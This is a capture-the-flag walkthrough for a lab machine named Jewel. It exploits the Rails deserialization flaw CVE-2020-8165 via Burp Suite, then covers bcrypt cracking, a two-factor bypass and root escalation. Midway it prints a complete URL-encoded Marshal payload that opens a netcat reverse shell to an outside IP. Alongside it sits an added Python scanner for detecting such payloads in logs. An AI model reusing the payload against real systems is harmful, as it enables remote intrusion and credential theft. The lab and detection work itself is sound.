I started off with my initial nmap scan:
After looking over the nmap results, we have these two webpages to work with:
Looking through the Git page, I notice some activity from a user named “bill”, so that could be a potential username/email to use in the future. This is his project related to the blog.
When looking at some of the raw info from Bill, I noticed different references to Ruby and Gemfile, which definitely matches the theme of the box:
I really don’t know much about Gemfiles or even Ruby, but I did find a couple sources to read up on them. HERE is a good one.
What it looks like is that a Gemfile is just a little cache of code that Ruby uses as a place to store gems. Gems are dependencies or additional functionalities you can add to a Ruby program.
So we know Bill is using Gems and doing Ruby stuff. I’m going to leave that for now and check out the blog. I signed up for my own account before exploring around.
Here are some of the posts on there.
So I guess Jennifer likes to be cryptic, or maybe she is testing out the blog. A pangram is just a sentence that uses every letter. Bill is also getting in on the weirdness:
This next one seems to be in Latin:
It translates to:
“But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born, a complete account of the system, and expound the actual teachings of the great explorer of the truth and will unfold in the master-builder of human happiness. For no one rejects, dislikes, or avoids pleasure itself, because it is pleasure, but because they do not know how to pursue pleasure rationally encounter consequences that are the sorrows of those who have.”
You know, I didn’t really know much about Lorem Ipsum. I thought it was just a bunch of nonsense Latin words people used to fill in space, but because of this box I actually looked into it. The whole thing is a scrambled version of a publication from the philosopher Cicero in 45 AD called “The extreme of good and evil”. It was meant to be a treatise on the theory of ethics. Printers have actually been using it as a source for stand-in text since the 1500s.
Read more HERE if that interests you.
Anyways, back to Jewel. After that side quest, I eventually found a very recent exploit that seemed to work for the version of Ruby that Bill was using (CVE-2020-8165). Find info about it HERE or HERE.
The way I found this exploit was with the help of a website that scans gem files. Check it out HERE.
Just save the Gemfile.lock from the Git page to your own computer and then run it through the website. And yes, I did try a few of the other vulnerabilities, but this was the one that worked for me:
You can use this exploit with the help of Burp Suite. With intercept turned on, head to your user account on the blog. Send an update request, it doesn’t really matter what you send, just hit “update user”.
You should see something like this back at Burp. Send it to the repeater with the action tab, then turn intercept off.
I’m going to be using this part of the exploit from the GitHub page, just slightly modified:
Here is the whole script below with those changes, make sure to adjust your IP and take note of the port.
%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.14.69+4444+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T
You want to paste it right into the spot where your username is on the repeater screen (it replaces your username).
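From the defender's side, the payload above has a recognisable shape: a URL-encoded Ruby Marshal stream (it starts with the format bytes 4.8) carrying the DeprecatedInstanceVariableProxy/ERB gadget chain in a field that should only ever hold a username. The following is an added example, not code from the box or the exploit's GitHub page: a small Python scanner that URL-decodes form fields from constructed access-log lines and flags the ones that look like Marshal blobs. The log format and field names are assumptions for the example.

```python
from urllib.parse import unquote, unquote_to_bytes

# Every Ruby Marshal stream begins with the format version bytes 4.8.
MARSHAL_MAGIC = b"\x04\x08"

# Markers of the gadget chain used against CVE-2020-8165. In Marshal a symbol is
# ':' followed by a length byte; a 3-byte symbol has length byte 0x08, so the
# ERB check matches the encoded symbol :ERB rather than any username containing "ERB".
GADGET_MARKERS = (
    b"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy",
    b":\x08ERB",
)


def inspect_param(raw_value: str) -> dict:
    """URL-decode one form value and report whether it looks like a Marshal payload."""
    data = unquote_to_bytes(raw_value)
    looks_marshal = data.startswith(MARSHAL_MAGIC)
    gadgets = [g.decode("latin-1") for g in GADGET_MARKERS if g in data]
    return {
        "marshal": looks_marshal,
        "gadgets": gadgets,
        "suspicious": looks_marshal or bool(gadgets),
    }


def scan_request_line(line: str) -> list:
    """Return the decoded names of form fields in one log line that look like Marshal blobs.

    Assumed (constructed) log layout: "<METHOD> <PATH> <urlencoded body>".
    """
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return []
    flagged = []
    for pair in parts[2].split("&"):
        name, _, raw = pair.partition("=")
        if inspect_param(raw)["suspicious"]:
            flagged.append(unquote(name))
    return flagged


def scan_log(lines) -> dict:
    """Map line index -> flagged field names, omitting clean lines."""
    result = {}
    for index, line in enumerate(lines):
        hits = scan_request_line(line)
        if hits:
            result[index] = hits
    return result


# Constructed sample lines: a normal profile update, then one whose username field
# carries the Marshal prefix and gadget class names (truncated, not a working payload).
LOG_LINES = [
    "PUT /users/7 user%5Busername%5D=bill&user%5Bemail%5D=bill%40example.com",
    "PUT /users/7 user%5Busername%5D=%04%08o%3A%40ActiveSupport%3A%3ADeprecation"
    "%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09"
    "%40srcI%22%0Aecho+hi%06%3A%06ET&user%5Bemail%5D=bill%40example.com",
]

if __name__ == "__main__":
    for index, fields in scan_log(LOG_LINES).items():
        print(f"line {index}: Marshal-looking data in {fields}")
```

The magic-byte check alone already catches this class of payload regardless of which gadget chain is used; the gadget markers are there to label the hit. Note that the check runs on the decoded bytes, so double-encoding the `%04%08` prefix would still be caught after a second `unquote_to_bytes` pass if your front end decodes twice.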
Now, set up a listener with netcat real quick:
Send the request in the repeater and then check back at the blog, reload the page.
You should now have a shell back at your listener. Upgrade it and grab the user flag (I don’t know why I changed to the root directory here, just ignore that part).
After this, head to the backups location:
You will see a database dump file. That will actually have the hash for Bill’s password (and Jennifer’s too):
These are bcrypt, so let’s crack them with Hashcat (I used my other VM for this):
OK, I got Bill’s back quickly as “spongebob”, so I will work with this one while Hashcat tries for Jennifer’s in the background.
From here I checked to see what Bill could do on this machine. Looks like he has some sort of two-factor authentication on the account. I remember seeing a Google-Authenticator while I was snooping around the file system earlier:
Here you can see the authenticator.
I threw an authenticator add-on onto the browser I was using so I could grab a code for Bill.
After it’s installed, press the little pencil button and choose manual entry.
This will generate a code, and we can resume what we were trying to do earlier:
With the help of GTFOBins, I found a way to grab root using this information:
I never did get Jennifer’s password.
Happy Hacking! ❤